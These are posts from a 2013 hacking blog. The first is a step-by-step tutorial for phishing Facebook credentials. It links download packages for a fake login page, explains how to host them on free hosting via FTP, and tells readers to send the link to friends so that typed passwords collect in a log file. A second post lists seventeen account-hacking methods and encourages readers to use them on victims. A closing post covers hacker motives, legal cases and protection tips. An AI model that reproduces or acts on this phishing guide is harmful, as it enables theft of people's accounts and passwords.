Sunday, 25 August 2013

How To Hack Facebook (Facebook Phishing) EASY !!

How To Hack Facebook (Facebook Phishing) EASY !!


Introduction

Hey guys you are about to learn how to do easy facebook phishng
now what it does is that that you will have a phishing link (after you do the hack below in the blog)
and when you send the link to your freinds and they open the link , they will find a facebook page (fake) and when they enter their email and password it will come to you directly
so have fun!!



Facebook Phishing

Hey guys today im going to show you how to hack facebook using Facebook Phishing , Phishing is very easy to do , you just have to send the phishing link to anyone and when hey press the link a fake facebook page comes he then logs in to his account and the Email Id and Password will be sent to you Now
First. Sign up in bplaced.net
the problem in bplaced is that you have to sign up at certain times because the site has too much preasure
Second. There are two types of folders you need to download
A. http://www.mediafire.com/?2t2s7fulkmb42zx 
B. http://www.mediafire.com/?5854ndystj5p2ja 

Third. when you sign up to your account in bplaced got to Ftp Management
and copy your Ftp Server link
and then download http://filezilla-project.org/download.php/ (filezilla)



Next Step The Hack

First. open filezilla , type in
Host : your ftp server from bplaced (without http://)
Username : your bplaced username
Password : your bplaced password
Port : 21
Then press quickconnect 




       







After that download your two files as shown in this video 






then after that open your  ftp server link and press on index.htm then copy the link to send it to your freinds





Now you can send the fake facebook page link to your friends
And when you test it and type anything you want in the email and password (on the fake facebook page) it will come directly in a file called log.txt in the ftp server and filezilla And That’s it don’t forget to like this blog and share it etc.



Saturday, 24 August 2013

All Types Of Hacking Techniques.. 17 ways to bring accounts to your Mercy.

All Types Of Hacking Techniques.. 17 ways to bring accounts to your Mercy.



So, Its time now that we should know what are various categories hacking fall into. I will try to focus on the ones based on password hacking. I've also written a small post on email hacking techniques already but this one will cover it elaborately. There is no distinct classification of hacking.. but i will list all i could remember..

So, as you all would have guessed this will not be a practical application.. I will give tutorials on all of them in coming posts.. but its the most important thing to have basic knowledge about all the techniques available.. So, consider going through the post once..


Common Methods for Hacking Computer Terminals(Servers):
This comprises of either taking control over terminal(or Server) or render it useless or to crash it.. following methods are used from a long time and are still used..

1. Denial of Service - 
DoS attacks give hackers a way to bring down a network without gaining internal access. DoS attacks work by flooding the access routers with bogus traffic(which can be e-mail or Transmission Control Protocol, TCP, packets).

2. Distributed DoSs -
Distributed DoSs (DDoSs) are coordinated DoS attacks from multiple sources. A DDoS is more difficult to block because it uses multiple, changing, source IP addresses.

3. Sniffing - 
Sniffing refers to the act of intercepting TCP packets. This interception can happen through simple eavesdropping or something more sinister.

4. Spoofing - 
Spoofing is the act of sending an illegitimate packet with an expected acknowledgment (ACK), which a hacker can guess, predict, or obtain by snooping

5. SQL injection -
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. It uses normal SQL commands to get into database with elivated privellages..

6. Viruses and Worms - 
Viruses and worms are self-replicating programs or code fragments that attach themselves to other programs (viruses) or machines (worms). Both viruses and worms attempt to shut down networks by flooding them with massive amounts of bogus traffic, usually through e-mail.

7. Back Doors - 
Hackers can gain access to a network by exploiting back doors administrative shortcuts, configuration errors, easily deciphered passwords, and unsecured dial-ups. With the aid of computerized searchers (bots), hackers can probably find any weakness in the network.


So, not interested in these stuffs.. huh??? wait there is more for you.. So, how about the one related to hacking the passwords of email and doing some more exciting stuffs.. The various methods employed for this are:

Trojan horses, which are attached to other programs, are the leading cause of all break-ins. When a user downloads and activates a Trojan horse, the software can take the full control over the system and you can remotely control the whole system.. great..!!! They are also reffered as RATs(Remote Administration tools). I've written about them here.

Consider the situation, everything you type in the system is mailed to the hacker..!! Wouldn't it be easy to track your password from that.. Keyloggers perform similar functionallities.. So next time you type anything.. Beware..!! Have already posted about keyloggers and ways to protect yourself from them.. 


10. BruteForcing - 
The longest and most tiring job.. don't even consider this if you don't know the SET of password for your victim..

11. Secret Question - 
According to a survey done by security companies, it is found that rather than helping the legitimate users the security questions are more useful to the hackers.. So if you know the victim well try this..

12. Social Engineering - 
Ya this was one of the oldest trick to hack.. Try to convince your user that you are a legitimate person from the system and needs your password for the continuation of the service or some maintainence.. This won't work now since most of the users are now aware about the Scam.. But this Social Engginering concept is must for you to have to convince victim for many reasons..!!!

13. Phishing 
This is another type of keylogging, here you have to bring the user to a webpage created by you resembling the legitimate one and get him to enter his password, to get the same in your mail box..!! Use social engginering.. A detailed guide for the phishing can be found here or an introductory and setup explanation here

14. Fake Messengers - 
So its a form of phishing in the application format.. getting user, to enter the login info in the software and check your maill..!!!

15. Cookie Stealer - 
Here the cookie saved by the sites are taken and decoded and if you get lucky.. You have the password..!!!

Hmmm.. not satisfied with single account at a time..?? so there are ways to hack lots of accounts together.. I know few but there exists many..!! listed are the ones i know and will teach you in coming posts...

16. DNS Poisoning or PHARMING - 
So, phisihing is a tough job.. isn't it..?? convincing someone to enter their password at your page..?? what if you don't have to convince..?? what if they are directed automatically to your site without having a clue..?? Nice huh..?? Pharming does the same for you.. More about it in my next post..

17. Whaling 
This method gets you the password of the accounts which are used by the hackers to recive the passwords.. So you just have to hack one ID, which is simplest method( Easy then hacking any other account, will tell you how in coming posts..) and you will have loads of passwords and so loads of accounts at your mercy..!!!

I would like to add one thing the methods metioned under exiting ways are easy but are for newbiees and script kiddies so if you really want to learn hacking then do some real work, then relaying on the softwares or tools.. will give info of that in my later posts.. or comment if you want any more info.. 


some basic info about hacking................

SOME BASIC INFO ABOUT HACKING.......... :


What are hackers?


  • Hackers are people who try to gain unauthorised access to your computer. This is normally done through the use of a 'backdoor' program installed on your machine. You can protect yourself from these by using a firewalland a good up-to-date anti-virus program. You would normally get such a backdoor program by opening an E-mail attachment containing the backdoor program. It is normal for such a backdoor program to send out more copies of itself to everyone in your address book, so it is possible for someone you know to unintentionally send you a malicious program. A few backdoor programs can work with any e-mail program by sitting in memory and watching for a connection to a mail server, rather than actually running from within a specific mail program. These programs automatically attach themselves to any e-mail you send, causing you to unintentionally send out malicious programs to your friends and associates.


Why do hackers hack?

  • To a hacker, breaking into someone’s computer is simply a challenge. They may not specifically intend to do damage to the computer. The thrill of simply gaining access is often enough. Hackers often try to show off their skills to the world by hacking into government computers, or as revenge against another user or agency. Hackers are indeed as the stereotype depicts them as; young males with a thirst for knowledge. Despite rumours, all hackers do not wear nerdy glasses.

What damage can a hacker do?

  • This depends upon what backdoor program(s) are hiding on your PC. Different programs can do different amounts of damage. However, most allow a hacker to smuggle another program onto your PC. This means that if a hacker can't do something using the backdoor program, he can easily put something else onto your computer that can. Hackers can see everything you are doing, and can access any file on your disk. Hackers can write new files, delete files, edit files, and do practically anything to a file that could be done to a file. A hacker could install several programs on to your system without your knowledge. Such programs could also be used to steal personal information such as passwords and credit card information. Some backdoor programs even allow a hacker to listen in on your conversations using your computer's microphone if one is attached!

Types of hackers

Hackers often can be characterized by their motives. The following are the more common types of hackers and the motives they cite:
  • Pranksters: These hackers are the mischief-makers of the bunch whose intention is merely to be a nuisance. They are the equivalent of individuals who pull fire alarms or make phony bomb threats. Copycat hackers would also fall into this category.
  • Fame seekers: This group hacks seeking attention or notoriety. Using a code name, these individuals target high-profile sites such as Yahoo!, eBay, or NASA to achieve bragging rights among their peers.
  • Educational: Students justify hacking into systems by saying that they are honing their programming skills.
  • Criminals: When bank robber Willie Sutton was asked why he robbed banks, he replied: "That’s where the money is." Stored data or "data at rest" is more profitable to steal than data moving over the Internet. Why steal one credit card number at a time when you can steal tens of thousands to millions with one break-in? This happened to CDUniverse and RealNames. Pacific Bell had to have more than 60,000 customers change their passwords after hackers stole them.

What constitutes hacking?

  • Computer fraud is the legal term for a large part ofwhat most consider hacking. Another form of hacking is the illegal seizure and unathorized use of credit card numbers. 

Cases that have helped to shape the law

  • Kevin Mitnick was arrested for stealing credit card numbers and for gaining illegal entry into numerous systems via the internet. 
    • Arrested at 1:30 a.m., February 15, 1995, in Raleigh, N.C. 
    • Eluded the F.B.I. for three years. 
    • He was charged with everything from the theft of more than 20,000 credit card numbers to the illegal entry into numerous computer networks. Oddly enough, the court could not prove that Mitnick ever actually used any of the stolen credit card numbers. 
    • He was caught by Tsutomu Shimomura, a computer security expert and senior research fellow at the San Diego Supercomputer Center. 
    • Lots of ethical questions are raised by the financial fallout of Mitnick's demise. 
      • Mitnick undoubtedly violated the law by illegally acquiring those credit card numbers. 
      • Was the method of his capture legal, though? They captured Mitnick using wiretaps, and by "hunting" him down on the internet. Tsutomu even admits to "baiting" Mitnick with tempting software in a few instances to draw h im out into the open. 
      • Could this be considered entrapment? Mistrials have been called for less. 

      •  
  • Ed Cummings was the first person in the United States to be imprisoned for possession of a red box. 
    • The charges 
      • The grand jury charged that he "knowingly and with intent to defraud did possess and have custody and control of a telecommunications instrument, that had been modified and altered to obtain unauthorized use of telecommunicatio n services through the use of public telephones" on or about March 13 and 15 of 1995. 
      • He was also charged with "being in possession of hardware and software used for altering and modifying telecommunications instruments to obtain unauthorized access to telecommunications service." 
    • Is it ethical to sell the components, if someone can be jailed for amassing them into one single object? Welcome to Radio Shack. 
    • Where in the world could he have obtained information regarding a tone dialer
    • He was sentenced to seven months in federal prison, but was released three days later so that he could attend a hearing on whether or not he violated his probation. 
    • The violation in question was his supposed removal of batteriesfrom the tone-dialer when the police arrived. 
    • The hearing was postponed many times, but finally took place on a day when the weather was so bad his lawyer could not show up. 
      • Was the judge ethically justified in discarding Cummings' right to a fair trial? 
    • The judge refused to let Cummings speak and said that he had definitely violated probation, ordering him to be held on $250,000 bail, to be sentenced within 60 days. 
    • He was sentenced 6 to 24 months in prison plus a $3,000 fine. 

    •  
  • Craig Neidorf, an employee of Bellsouth, was arrested for distributing information that was thought to have been illegally obtained from the comp any. 
    • A pre-law student at the University of Missouri and the editor of Phrack Magazine, was questioned first at home, then had his house searched, a nd then was called in for questioning by the U.S. Attorney's Office in Chicago in 1990 in which he complied willingly. 
    • On February 1, 1990 Neidorf was indicted by a grand jury on six counts including wire fraud, computer fraud, and transportation of stolen property greater than $5,000. 
    • The trial began on July 23, 1990 in Chicago's District Court for the Northern District of Illinois, in which the prosecution withheld witnesses, one Secret Service agent, a friend of Neidorf's and alleged co-conspirator, and many of Ne idorf's fellow employees at Bellsouth. 
    • He was found in possession of a file detailing an enhanced 911system belonging to Bellsouth (regarded as hacking instructions), a T rojan Horse program, and an announcement in his magazine regarding "The Phoenix Project" (an elite bulletin board), which included a statement regarding the freedom of knowledge. 
    • The articles were proven harmless. The Trojan Horse Login program belonged to him and was never used. Finally, the Phoenix Projectwas observed and regarded to be insignificant. 
    • A mistrial was declared, but Neidorf was left with a $100,000 court bill. 
    • Should the court be ethically obligated to compensate Neidorf for his trouble? 

    •  
  • Steve Jackson Games 
    • On the morning of March 1, armed Secret Service agents and Austin police occupied the offices of Steve Jackson Games and began a search for computer equipment. The house of Loyd Blankenship, the writer of GURPS Cyberpunk, was also rai ded. 
    • Four computes, two laser printers, some loose hard disks, and a great deal of assorted hardware were seized
    • The only computers taken were those with GURPS Cyberpunk files. The agents cut locks, forced footlockers, and tore up boxes in their frantic search. 
    • It was supposed that GURPS (a soon-to-become famous role-playing game) was to be "a handbook for computer crime." The seized materials were ful l of references to futuristic equipment that didn't exist. 
    • The Secret Service kept one company hard disk, all Loyd's personal equipment and files, and the printouts of GURPS Cyberpunk. 
    • SJ Games survived the loss only by laying off half its employees. 
    • SJ Games received a copy of the Secret Service warrant affidavit on October 21, 1990. The cause for the search was Games' remote association with Neidorf and a few other main-stream computer elitists. 
    • The case finally came to trial in early 1993. 
    • The Secret Service lost, and S. J. Games was awarded $50,000 in damages, plus over $250,000 in attorney's fees. 
    • Be sure to read the article closely. The law states that the Secret Service did not violate any laws by reading any of the mail on the computers, as opposed to anything sent through the United States Postal Service. 
    • Should email be given the same status as actual mail? Should the medium make a difference?

In Favor of Hacking

Keep in mind that the ethical debate for hacking stems entirely in the definition of what it is to hack. Everyone realizes it is illegal to take money from a bank via a computer without authorization, but it might not be illegal to "hack" into a system if you do so because you are aware of a security flaw and wish to bring it to the attention of the proper authorities (without malicious intent).The following are sorted by their definitions of hacker:

Advice on Protecting your PC

A skilled hacker will do whatever it takes to break into your computer. Just ask Microsoft. Even a giant software company is not completely safe. The company was hacked by a Trojan-horse program hidden inside an innocent-looking email attachment. The Trojan horse replicated itself throughout Microsoft's internal network and eventually emailed proprietary secrets back to the originator of the Trojan horse. Follow these six steps to protect your computer from being hacked:
  • Don't let other people onto your computer unless you really trust them. A great way to do this is to password-protect your computer.
  • Don't ever open attachments. Avoid Trojan horses and viruses by following this rule. For more information, go here.
  • Turn off file sharing if you don't need it. If a port scan is done on your computer, a hacker may find a back door to your machine and access your files.
  • Use an antivirus program and keep it up to date. For more information, gohere.
  • If you have a constant Internet connection, use a firewall. For more information, go here.
  • Routinely update Windows software. This is extremely important. Updates fix many bugs and known security holes within the Windows operating system.

Related Posts Plugin for WordPress, Blogger...